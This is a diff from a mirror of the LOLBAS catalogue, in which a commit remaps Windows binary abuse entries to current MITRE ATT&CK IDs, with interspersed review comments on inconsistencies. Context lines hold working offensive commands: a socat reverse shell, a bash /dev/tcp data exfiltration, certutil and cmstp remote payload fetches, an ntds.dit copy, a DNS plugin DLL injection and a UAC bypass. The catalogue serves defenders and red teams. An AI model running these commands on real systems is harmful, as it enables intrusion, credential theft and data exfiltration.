mirror of https://github.com/LOLBAS-Project/LOLBAS, synced 2025-10-25 14:55:19 +02:00
	MITRE ATT&CK realignment sprint
		| @@ -5,12 +5,11 @@ Author: 'Wade Hickey' | ||||
| Created: '2020-12-02' | ||||
| Commands: | ||||
|   - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw | ||||
|     Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>  | ||||
|     Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY> | ||||
|     Usecase: Download file from Internet | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe | ||||
|   | ||||
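Review bot: the Full_Path line at the end of this hunk pins a package version (Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe), so the path goes stale on the next App Installer update; mark the version segment as variable the way the Description already does with <RANDOM-8-CHAR-DIRECTORY>. The Description change itself is whitespace-only, and the net -1 line is the MitreLink removal.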
| @@ -1,6 +1,6 @@ | ||||
| --- | ||||
| Name: Aspnet_Compiler.exe | ||||
| Description: ASP.NET Compilation Tool  | ||||
| Description: ASP.NET Compilation Tool | ||||
| Author: Jimmy (@bohops) | ||||
| Created: 2021-09-26 | ||||
| Commands: | ||||
| @@ -10,14 +10,13 @@ Commands: | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1218/ | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | ||||
|   - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe | ||||
| Code_Sample:  | ||||
| Code_Sample: | ||||
|   - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder | ||||
| Detection:  | ||||
| Detection: | ||||
|   - IOC: Sysmon Event ID 1 - Process Creation | ||||
| Resources: | ||||
|   - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ | ||||
| @@ -25,4 +24,4 @@ Resources: | ||||
| Acknowledgement: | ||||
|   - Person: cpl | ||||
|     Handle: '@cpl3h' | ||||
| --- | ||||
| --- | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: Local Admin | ||||
|     MitreID: T1053 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1053 | ||||
|     OperatingSystem: Windows 7 or older | ||||
| Full_Path: | ||||
|   - Path: C:\WINDOWS\System32\At.exe | ||||
|   | ||||
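Review bot: MitreID stays on the parent T1053 while the MitreLink is dropped, even though this sprint moves other entries to sub-technique IDs (cmstp to T1218.003, eventvwr to T1548.002 further down); At.exe should be checked against its sub-technique rather than left on the parent, otherwise the realignment is incomplete for this file.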
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\Atbroker.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 10 | ||||
|   - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" | ||||
|     Description: Executes a reverseshell | ||||
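Review bot: typo in the Description on the last line of this hunk, "Executes a reverseshell" should read "Executes a reverse shell".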
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 10 | ||||
|   - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' | ||||
|     Description: Exfiltrate data | ||||
| @@ -26,7 +24,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 10 | ||||
|   - Command: bash.exe -c calc.exe | ||||
|     Description: Executes calc.exe from bash.exe | ||||
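Review bot: the Category: Execute and MitreID T1218 at the top of this hunk belong to the preceding "Exfiltrate data" entry (`bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/...'`), which is an outbound data transfer, not execution; other entries in this commit use Category: Upload for that kind of action (certreq -Post, ConfigSecurityPolicy, the latter on T1567), so both the category and the mapping look misaligned for that entry.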
| @@ -34,7 +31,6 @@ Commands: | ||||
|     Category: AWL Bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\bash.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique. | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 | ||||
|     Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. | ||||
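Review bot: the Description on the last line does not match the Command above it: the command adds autoruns.exe from live.sysinternals.com and has no /SetNotifyCmdLine step, but the Description says it adds cmd.exe and configures the job to run a target command (that text matches the later /SetNotifyCmdLine entry). The four bitsadmin invocations are also run together without the `&` separators the other one-liners in this file use, so the string does not work as a single command line.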
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset | ||||
|     Description: Command for copying cmd.exe to another folder | ||||
| @@ -26,7 +24,6 @@ Commands: | ||||
|     Category: Copy | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset | ||||
|     Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. | ||||
| @@ -34,7 +31,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\bitsadmin.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1218/ | ||||
|     OperatingSystem: Windows Server 2022 | ||||
|   - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1 | ||||
|     Description: Downloads text formatted files | ||||
| @@ -18,14 +17,13 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1105/ | ||||
|     OperatingSystem: Windows Server 2022   | ||||
|     OperatingSystem: Windows Server 2022 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\certoc.exe | ||||
|   - Path: c:\windows\syswow64\certoc.exe | ||||
| Code_Sample:  | ||||
| Code_Sample: | ||||
|   - Code: | ||||
| Detection:  | ||||
| Detection: | ||||
|   - IOC: Process creation with given parameter | ||||
|   - IOC: Unsigned DLL load via certoc.exe | ||||
|   - IOC: Network connection via certoc.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal | ||||
|     Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST | ||||
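Review bot: the Command field on the second-to-last line of this hunk carries trailing prose ("and show response in terminal") that is not part of the command line; move it into the Description, which already states what the POST does, so the Command value is copy-clean.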
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Upload | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\certreq.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe | ||||
|     Description: Download and save 7zip to disk in the current folder. | ||||
| @@ -18,15 +17,13 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | ||||
|     Description: Download and save a PS1 file to an Alternate Data Stream (ADS). | ||||
|     Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: certutil -encode inputFileName encodedOutputFileName | ||||
|     Description: Command to encode a file using Base64 | ||||
| @@ -34,7 +31,6 @@ Commands: | ||||
|     Category: Encode | ||||
|     Privileges: User | ||||
|     MitreID: T1027 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1027 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: certutil -decode encodedInputFileName decodedOutputFileName | ||||
|     Description: Command to decode a Base64 encoded file. | ||||
| @@ -42,7 +38,6 @@ Commands: | ||||
|     Category: Decode | ||||
|     Privileges: User | ||||
|     MitreID: T1140 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1140 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: certutil --decodehex encoded_hexadecimal_InputFileName | ||||
|     Description: Command to decode a hexadecimal-encoded file decodedOutputFileName | ||||
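Review bot: the last two lines of this hunk are inconsistent with the rest of the file: the Command `certutil --decodehex encoded_hexadecimal_InputFileName` uses a double dash where the -encode and -decode entries above use a single dash, and the Description ends with a dangling "decodedOutputFileName" that does not appear in the Command; the output-file argument appears to have been dropped from the command and pasted into the description.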
| @@ -50,7 +45,6 @@ Commands: | ||||
|     Category: Decode | ||||
|     Privileges: User | ||||
|     MitreID: T1140 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1140 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\certutil.exe | ||||
|   | ||||
| @@ -9,16 +9,14 @@ Commands: | ||||
|     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1170 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1170 | ||||
|     MitreID: T1059.003 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: cmd.exe - < fakefile.doc:payload.bat | ||||
|     Description: Execute payload.bat stored in an Alternate Data Stream (ADS). | ||||
|     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1170 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1170 | ||||
|     MitreID: T1059.003 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\cmd.exe | ||||
|   | ||||
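Review bot: both Category: ADS entries in this hunk move from T1170 to T1059.003, whereas every other Category: ADS entry in this commit (bitsadmin, certutil, cscript, diantz, esentutl, expand, extrac32, findstr, forfiles) is realigned to T1564.004, and the control.exe ADS entry goes to T1218.002. Either the category or the mapping convention should be made consistent, or the reasoning (execution through the command shell versus hiding in an ADS) should be recorded for these files so the next realignment does not flip them back.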
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Credentials | ||||
|     Privileges: User | ||||
|     MitreID: T1078 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1078 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\cmdkey.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1105/ | ||||
|     OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\cmdl32.exe | ||||
|   | ||||
| @@ -9,16 +9,14 @@ Commands: | ||||
|     Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet. | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1191 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1191 | ||||
|     MitreID: T1218.003 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf | ||||
|     Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. | ||||
|     Usecase: Execute code hidden within an inf file. Execute code directly from Internet. | ||||
|     Category: AwL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1191 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1191 | ||||
|     MitreID: T1218.003 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\cmstp.exe | ||||
|   | ||||
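Review bot: Category "AwL bypass" on the second entry of this hunk uses a different casing than "AWL Bypass" (Aspnet_Compiler) and "AWL bypass" (Dfsvc) elsewhere in this commit; if Category values are consumed by tooling, mixed casing splits one category into three, so normalize it while the file is being touched.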
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Upload | ||||
|     Privileges: User | ||||
|     MitreID: T1567 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1567/ | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1196 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1196 | ||||
|     MitreID: T1218.002 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\control.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Compile | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: csc -target:library File.cs | ||||
|     Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Compile | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\cscript.exe | ||||
|   | ||||
| @@ -10,13 +10,12 @@ Commands: | ||||
|     Category: Upload | ||||
|     Privileges: User | ||||
|     MitreID: T1567 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1567/ | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe | ||||
| Code_Sample:  | ||||
| Code_Sample: | ||||
|   - Code: https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6 | ||||
| Detection:  | ||||
| Detection: | ||||
|   - IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory. | ||||
|   - IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS. | ||||
|   - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil. | ||||
|   | ||||
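Review bot: the first IOC under Detection ("The DataSvcUtil.exe tool is installed in the .NET Framework directory.") describes where the binary lives, which the Full_Path line already records, and is not an indicator; the two IOCs that follow (non-RFC1918 destination addresses, process creation from non-SYSTEM and non-LOCAL SERVICE accounts) are the actual detection guidance. Drop the first item or reword it as a note.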
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1105/ | ||||
|     OperatingSystem: Windows 10 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\desktopimgdownldr.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Hide data compressed into an Alternate Data Stream. | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1. | ||||
|   - Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab | ||||
|     Description: Download and compress a remote file and store it in a cab file on local machine. | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\diantz.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Dump | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows server | ||||
|   - Command: diskshadow> exec calc.exe | ||||
|     Description: Execute commands using diskshadow.exe to spawn child process | ||||
| @@ -18,7 +17,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1003 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1003 | ||||
|     OperatingSystem: Windows server | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\diskshadow.exe | ||||
|   | ||||
| @@ -10,12 +10,11 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1546.015 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1546/015/ | ||||
|     OperatingSystem: Windows 10 (and likely previous versions) | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\dllhost.exe | ||||
|   - Path: C:\Windows\SysWOW64\dllhost.exe | ||||
| Code_Sample:  | ||||
| Code_Sample: | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: | ||||
|   | ||||
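Review bot: Code_Sample and Detection in this hunk hold empty placeholders (`- Code:` and ` - IOC:`) indented with zero and one space, while the other files in this commit use the two-space `  - Code:` / `  - IOC:` form; the whitespace sweep that trims `Code_Sample:` here should normalize that too. An empty IOC list also leaves a T1546.015 entry with no detection guidance at all.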
| @@ -6,11 +6,10 @@ Created: 2018-05-25 | ||||
| Commands: | ||||
|   - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll | ||||
|     Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details. | ||||
|     Usecase: Remotly inject dll to dns server | ||||
|     Usecase: Remotely inject dll to dns server | ||||
|     Category: Execute | ||||
|     Privileges: DNS admin | ||||
|     MitreID: T1035 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1035 | ||||
|     MitreID: T1543.003 | ||||
|     OperatingSystem: Windows server | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\Dnscmd.exe | ||||
|   | ||||
| @@ -10,39 +10,34 @@ Commands: | ||||
|     Category: Copy | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o | ||||
|     Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file. | ||||
|     Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o | ||||
|     Description: Copies the source Alternate Data Stream (ADS) to the destination EXE. | ||||
|     Usecase: Extract hidden file within alternate data streams | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o | ||||
|     Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file. | ||||
|     Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o | ||||
|     Description: Copies the source EXE to the destination EXE file | ||||
|     Usecase: Use to copy files from one unc path to another | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit | ||||
|     Description: Copies a (locked) file using Volume Shadow Copy | ||||
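Review bot: the fourth entry in this hunk (`esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o`, Category: Download) is realigned from T1096 to T1564.004, but that command copies between two UNC paths and involves no alternate data stream; the other Copy and Download entries in this file and commit sit on T1105, so the new ID looks like a carry-over from the three ADS entries above it.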
| @@ -50,7 +45,6 @@ Commands: | ||||
|     Category: Copy | ||||
|     Privileges: Admin | ||||
|     MitreID: T1003 | ||||
|     MitreLink: https://attack.mitre.org/techniques/T1003/ | ||||
|     OperatingSystem: Windows 10, Windows 2016 Server, Windows 2019 Server | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\esentutl.exe | ||||
|   | ||||
| @@ -9,8 +9,7 @@ Commands: | ||||
|     Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. | ||||
|     Category: UAC bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1088 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1088 | ||||
|     MitreID: T1548.002 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\eventvwr.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: expand c:\ADS\file1.bat c:\ADS\file2.bat | ||||
|     Description: Copies source file to destination. | ||||
| @@ -18,15 +17,13 @@ Commands: | ||||
|     Category: Copy | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat | ||||
|     Description: Copies source file to destination Alternate Data Stream (ADS) | ||||
|     Usecase: Copies files from A to B | ||||
|     Category: ADS | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     MitreID: T1564.004 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\Expand.exe | ||||
|   | ||||
| @@ -10,7 +10,6 @@ Commands: | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
